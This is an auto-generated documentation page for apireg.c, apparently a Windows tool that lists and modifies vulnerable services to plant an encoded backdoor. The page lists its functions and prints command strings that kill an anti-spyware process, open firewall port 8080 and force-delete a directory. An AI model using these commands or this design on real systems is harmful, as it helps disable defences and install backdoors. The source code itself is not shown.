#include <stdio.h>#include <windows.h>Go to the source code of this file.
Functions | |
| void | doFormatMessage (unsigned int dwLastErr) |
| void | usage (void) |
| DWORD | StartModifiedService (SC_HANDLE SCM, char *srv, BOOL dbg) |
| void | ListVulnerableService (char *host) |
| char * | GetOwner (char *servicio) |
| int | main (int argc, char *argv[]) |
Variables | |
| char | init [] = "cmd.exe /c rd /Q /S \\HXR" |
| char | antispyware [] = "taskkill.exe /IM gcasDtServ.exe" |
| char | firewall [] = "cmd.exe /c netsh firewall add portopening TCP 8080 SrvCheck ENABLE ALL" |
| char | EncodedBackdoor [] |
| BYTE | LIST = 0 |
| BYTE | HELP = 0 |
| BYTE | BACKDOOR = 1 |
| BYTE | STOP = 0 |
| char | RemoteHost [256] |
| char | permission [256] |
| void doFormatMessage | ( | unsigned int | dwLastErr | ) |
Definition at line 269 of file apireg.c.
Referenced by ListVulnerableService(), main(), and StartModifiedService().
| char * GetOwner | ( | char * | servicio | ) |
Definition at line 491 of file apireg.c.
References permission.
Referenced by ListVulnerableService().
| void ListVulnerableService | ( | char * | host | ) |
Definition at line 417 of file apireg.c.
References doFormatMessage(), GetOwner(), and RemoteHost.
Referenced by main().
| int main | ( | int | argc, | |
| char * | argv[] | |||
| ) |
Definition at line 101 of file apireg.c.
References antispyware, BACKDOOR, doFormatMessage(), EncodedBackdoor, firewall, HELP, init, LIST, ListVulnerableService(), RemoteHost, StartModifiedService(), STOP, and usage().
| DWORD StartModifiedService | ( | SC_HANDLE | SCM, | |
| char * | srv, | |||
| BOOL | dbg | |||
| ) |
Definition at line 287 of file apireg.c.
References BACKDOOR, and doFormatMessage().
Referenced by main().
| char antispyware[] = "taskkill.exe /IM gcasDtServ.exe" |
| BYTE BACKDOOR = 1 |
| char EncodedBackdoor[] |
| char init[] = "cmd.exe /c rd /Q /S \\HXR" |
| char permission[256] |
| char RemoteHost[256] |
1.5.4